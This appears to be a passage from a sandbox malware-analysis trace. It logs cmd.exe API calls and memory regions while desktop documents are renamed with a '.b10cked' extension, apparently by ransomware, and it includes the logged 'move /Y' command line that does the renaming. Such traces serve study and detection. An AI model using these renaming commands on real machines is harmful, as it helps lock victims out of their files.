[0231.824] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.824] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.824] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.824] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.824] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.824] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.824] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.825] GetEnvironmentStringsW () returned 0x3822c8* [0231.825] FreeEnvironmentStringsW (penv=0x3822c8) returned 1 [0231.825] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.825] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.825] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.825] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.825] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.825] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.825] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.825] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.825] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.825] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.330] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fb48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.330] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fb48, lpFilePart=0x18fb44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fb44*="Desktop") returned 0x18 [0232.330] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.330] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f8c4 | out: lpFindFileData=0x18f8c4) returned 0x380008 [0232.330] FindClose (in: hFindFile=0x380008 | out: hFindFile=0x380008) returned 1 [0232.330] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f8c4 | out: lpFindFileData=0x18f8c4) returned 0x380008 [0232.331] FindClose (in: hFindFile=0x380008 | out: hFindFile=0x380008) returned 1 [0232.331] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f8c4 | out: lpFindFileData=0x18f8c4) returned 0x380008 [0232.331] FindClose (in: hFindFile=0x380008 | out: hFindFile=0x380008) returned 1 [0232.331] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.331] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0232.331] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0232.331] GetEnvironmentStringsW () returned 0x382ae8* [0232.331] FreeEnvironmentStringsW (penv=0x382ae8) returned 1 [0232.331] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.332] GetConsoleOutputCP () returned 0x1b5 [0232.332] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.332] GetUserDefaultLCID () returned 0x409 [0232.332] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fc88, cchData=128 | out: lpLCData="0") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fc88, cchData=128 | out: lpLCData="0") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fc88, cchData=128 | out: lpLCData="1") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0232.333] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.334] GetConsoleTitleW (in: lpConsoleTitle=0x3708d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.334] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.334] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.335] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.335] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.335] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.335] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.336] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.336] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.336] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.336] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.336] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.339] GetConsoleTitleW (in: lpConsoleTitle=0x18f980, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.339] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.339] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.339] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.339] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.339] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.339] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.339] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.339] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.339] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.339] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.339] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.339] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.339] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.339] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.340] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.340] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.340] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.340] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.340] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.340] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.340] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.340] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.340] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.340] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.340] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.340] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.340] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.340] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.340] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.340] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.340] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.340] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.340] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.340] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.340] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.342] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.342] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.342] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f73c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f734, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f734*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.344] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.344] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.344] _wcsicmp (_String1="SXGPQH~1.ODP", _String2=".") returned 69 [0232.344] _wcsicmp (_String1="SXGPQH~1.ODP", _String2="..") returned 69 [0232.344] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqh~1.odp")) returned 0x20 [0232.344] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x381e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.344] SetErrorMode (uMode=0x0) returned 0x0 [0232.344] SetErrorMode (uMode=0x1) returned 0x0 [0232.345] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", nBufferLength=0x104, lpBuffer=0x18f0c4, lpFilePart=0x18f0ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", lpFilePart=0x18f0ac*="SXGPQH~1.ODP") returned 0x25 [0232.345] SetErrorMode (uMode=0x0) returned 0x1 [0232.345] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.345] _wcsicmp (_String1="SXGPQH~1.ODP", _String2=".") returned 69 [0232.345] _wcsicmp (_String1="SXGPQH~1.ODP", _String2="..") returned 69 [0232.345] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqh~1.odp")) returned 0x20 [0232.345] SetErrorMode (uMode=0x0) returned 0x0 [0232.345] SetErrorMode (uMode=0x1) returned 0x0 [0232.345] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", nBufferLength=0x104, lpBuffer=0x18f540, lpFilePart=0x18f2d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", lpFilePart=0x18f2d8*="SXGPQH~1.ODP") returned 0x25 [0232.345] SetErrorMode (uMode=0x0) returned 0x1 [0232.345] SetErrorMode (uMode=0x0) returned 0x0 [0232.345] SetErrorMode (uMode=0x1) returned 0x0 [0232.345] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked", nBufferLength=0x104, lpBuffer=0x18f748, lpFilePart=0x18f2d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked", lpFilePart=0x18f2d8*="SXGpQHv i4OFxmN5_1.odp.b10cked") returned 0x37 [0232.345] SetErrorMode (uMode=0x0) returned 0x1 [0232.345] SetLastError (dwErrCode=0x0) [0232.346] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqhv i4ofxmn5_1.odp.b10cked")) returned 0xffffffff [0232.346] GetLastError () returned 0x2 [0232.346] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", fInfoLevelId=0x1, lpFindFileData=0x18ec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec54) returned 0x370e50 [0232.346] FindNextFileW (in: hFindFile=0x370e50, lpFindFileData=0x18ec54 | out: lpFindFileData=0x18ec54) returned 0 [0232.346] GetLastError () returned 0x12 [0232.346] FindClose (in: hFindFile=0x370e50 | out: hFindFile=0x370e50) returned 1 [0232.347] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", fInfoLevelId=0x1, lpFindFileData=0x381bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x381bd0) returned 0x370e50 [0232.348] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked", nBufferLength=0x104, lpBuffer=0x18eeec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked", lpFilePart=0x0) returned 0x37 [0232.348] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp", nBufferLength=0x104, lpBuffer=0x18eeec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp", lpFilePart=0x0) returned 0x2f [0232.348] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqhv i4ofxmn5_1.odp")) returned 0x20 [0232.348] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqhv i4ofxmn5_1.odp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqhv i4ofxmn5_1.odp.b10cked"), dwFlags=0x3) returned 1 [0232.349] FindClose (in: hFindFile=0x370e50 | out: hFindFile=0x370e50) returned 1 [0232.349] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18eea0 | out: _Buffer=" 1") returned 9 [0232.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.349] GetFileType (hFile=0x7) returned 0x2 [0232.349] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.349] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18ee2c | out: lpMode=0x18ee2c) returned 1 [0232.350] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.350] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18ee60 | out: lpConsoleScreenBufferInfo=0x18ee60) returned 1 [0232.350] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.350] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18eea0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.350] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18ee84, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18ee84*=0x1a) returned 1 [0232.351] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.351] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.351] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.351] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.351] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.351] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.351] SetConsoleInputExeNameW () returned 0x1 [0232.351] GetConsoleOutputCP () returned 0x1b5 [0232.351] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.351] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.352] exit (_Code=0) Process: id = "612" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16800" os_pid = "0x6dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34395 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34396 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34397 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34398 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 34399 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34400 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34401 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34402 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34403 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34404 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34495 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34496 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34497 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34498 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 34499 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 34500 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34501 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34502 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34503 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34504 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34505 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34506 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34507 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34508 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34509 start_va = 0x430000 end_va = 0x4f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 34510 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34511 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34512 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34513 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34514 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34515 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34516 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 34517 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 34518 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 850 os_tid = 0x3a4 [0231.499] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afaa4 | out: lpSystemTimeAsFileTime=0x1afaa4*(dwLowDateTime=0xbd8afc00, dwHighDateTime=0x1d440a9)) [0231.499] GetCurrentProcessId () returned 0x6dc [0231.499] GetCurrentThreadId () returned 0x3a4 [0231.499] GetTickCount () returned 0x3fb6e [0231.499] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa9c | out: lpPerformanceCount=0x1afa9c*=28828859357) returned 1 [0231.500] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.500] __set_app_type (_Type=0x1) [0231.500] __p__fmode () returned 0x76b331f4 [0231.500] __p__commode () returned 0x76b331fc [0231.500] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.500] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.500] GetCurrentThreadId () returned 0x3a4 